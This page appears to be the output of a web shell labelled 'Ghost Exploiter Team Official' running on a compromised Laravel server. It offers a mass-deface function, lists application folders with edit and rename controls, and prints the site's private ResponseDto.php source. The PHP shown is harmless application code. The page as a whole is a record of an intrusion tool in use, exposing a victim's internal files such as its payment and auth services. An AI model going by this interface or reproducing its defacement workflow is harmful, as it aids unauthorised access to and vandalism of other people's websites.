Ghost Exploiter Team Official
Mass Deface
Directory >>
/
var
/
www
/
html
/
back
/
app
/
Domain
/
Article
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
type
file
dir
+File/Dir
Enums
--
ren
Requests
--
ren
Services
--
ren
ArticleService.php
6.725KB
edt
ren
AuthService.php
0KB
edt
ren
BankService.php
0KB
edt
ren
CreateArticleGroupReque
...
0.766KB
edt
ren
CreateArticleRequest.php
1.123KB
edt
ren
Dto.php
6.402KB
edt
ren
PaymentService.php
31.754KB
edt
ren
ResponseDto.php
1.147KB
edt
ren
auth.php
0KB
edt
ren
services.php
1.011KB
edt
ren
<?php declare(strict_types=1); namespace App\Responses; use Spatie\LaravelData\Data; class ResponseDto extends Data { public function __construct( public string|null $message = null, public array|null $errors = null, public object|array|null $data = null, public ?bool $status = null, /** @var PaginationDto */ public ?array $pagination = null, public ?bool $paginatable = false, ) { if ($this->status === null) { $this->status = true; } if ($this->paginatable && blank($this->pagination)) { $this->pagination = Dto::dataExample(PaginationDto::class); } if (!$this->paginatable) { unset($this->pagination); } unset($this->paginatable); } public static function example(): array { return [ 'data' => [ 'status' => true, 'message' => null, 'errors' => null, 'data' => [], 'pagination' => null, ], 'status' => true, ]; } }